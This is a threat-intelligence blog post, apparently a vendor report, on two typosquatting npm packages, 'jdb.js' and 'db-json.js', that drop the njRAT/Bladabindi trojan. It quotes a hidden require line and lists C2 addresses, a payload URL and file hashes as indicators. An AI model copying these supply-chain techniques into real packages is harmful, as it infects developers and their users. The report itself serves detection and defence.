trojan malware

New npm malware with Bladabindi trojan

Over Thanksgiving weekend, we discovered new malware in the npm registry: the Remote Access Trojan (RAT).

The malware package is

jdb.js
db-json.js
Both packages are released by the same author.

“jdb.js” attempts to mimic the legitimate NodeJS-based database library jdb. Again, the name of “db-json.js” is the same as that of the legitimate db-json library.

However, “jdb.js” is actually a malware package bundled with a remote access trojan (RAT) called njRAT aka Bladabindi.

RAT is a type of malware that allows an to take control of an infected system, execute arbitrary commands, run keyloggers, and conduct other surveillance activities in secret.

njRAT is an information-stealing Trojan that has been deployed in a wide range of attacks, which led Microsoft to shut down 4 million sites in 2014.

In recent years, variants of njRAT/Bladabindi have spread via Bitcoin scams on YouTube and Excel phishing emails. And, given njRAT’s customizability and ease of use on the dark web, these malwares have also been used by as part of ransomware toolkits.

Dissecting the npm malware “jdb.js”
Released last week, “jdb.js” is an npm package (not a JavaScript file) with only one version, 1.0.0, which contains three files.

package.json, the manifest file
module.js, a fuzzy script
patch.exe, the executable containing the njRAT payload
After installing the package, the package.json manifest file included in the package will launch module.js.

module.js is a highly obfuscated script that contains multiple base64-encoded blocks that cannot be easily decoded. Decoding these strings results in garbled code, which means that these base64 blocks contain binary or encrypted data.

The script performs a variety of malicious activities such as data collection and reconnaissance and eventually launches patch.exe, an njRAT dropper written in .

Although patch.exe contains an older known njRAT chain, at the time of our analysis, VirusTotal indicated that this particular sample was submitted to the engine by Sonatype last week, which means it contains at least some new information.

Decompiling the executable reveals this key information.

One of the class constructors, called “OK”, shows the location of the command and control (C2) server, the port the malware is trying to communicate with, the local folder, and so on, in a hard-coded string.

The hard-coded strings in the patch.exe example, such as the C2 server IP address, the name of the deleted process, etc.
Once patch.exe is run, it copies itself to the local “TEMP” folder on the system and renames itself “dchps.exe” (the value shown in the screenshot). the port on which the C2 server establishes a connection with it is 46.185.116.2:5552 (ZoomEye search result).

However, before communicating with the C2 infrastructure, the malicious executable edits the firewall rules to ensure that there are no problems communicating with hard-coded IPs. To do so, it issues the legitimate “netsh” command multiple times, starting from the following location.

C:\Users\admin\AppData\Local\Temp\dchps.exe, dchps.exe

The commands that the C2 server operator can execute remotely are quite extensive.

By infecting the host with this malware, remote attackers can record keystrokes, modify registry values, shut down or reboot the system at will, edit the Web browser (IE) start page, talk to users via voice synthesis, terminate or restart critical system processes (such as Task Manager, System Restore, and PING), and control hardware devices (such as CD drives, monitors, mice, keyboards, etc.).

The malware also contains a hard-coded link to https://dl.dropbox[…] com/s/p84aaz28t0hepul/Pass.exe, which has now been disabled by Dropbox, and the link is also frequently found in other njRAT examples.

Notably, the C2 server IP 46.185.116.2 (a ZoomEye search result) with which this example communicates is identical to the IOC observed in some CursedGrabber binaries, suggesting that CursedGrabber and the npm malware “jdb.js ” are related.

While “jdb.js” shows clear signs of maliciousness, it is “db-json.js” that is worrisome, as it is difficult to detect immediately.

First, at the time of analysis, “db-json.js” had a proper README page on npm, calling it JsonDb – an easy to use module that makes the database based on json files.

There are detailed instructions for developers on how to incorporate this library into their applications.

At first glance, the “db-json.js” package looks clean, as it contains the functional code needed for a real JSON DB creation package. However, it is secretly using the malicious “jdb.js” as a dependency.

Shown below are the manifest files from versions 1.0.3 and 1.0.4, which contain “jdb.js” as a dependency.

In addition, in version 1.0.4, the “dbmanager.js” class was further extended by appending multiple blank lines to the end of its functional code, the last line being

Require(‘jdb.js’);

This means that if someone is able to use “db-json.js” in their application to avoid “jdb.js”, they will not only be infected with the njRAT malware, but also put other developers at risk: installing or using applications built with “jdb-json.js”.

In our latest State of the Software Supply Chain report, we saw a 430% increase in malicious code injection in OSS projects or next-generation software supply chain attacks, and this is not the first time we have seen attacks that include fake components. This can be damaging to the software supply chain if adequate protections are not in place.

URLs and IPs:
46.185.116.2:5552

https://dl.dropbox[.] com/s/p84aaz28t0hepul/Pass.exe

Hashes:
d6c04cc24598c63e1d561768663808ff43a73d3876aee17d90e2ea01ee9540ff
86c11e56a1a3fed321e9ddc191601a318148b4d3e40c96f1764bfa05c5dbf212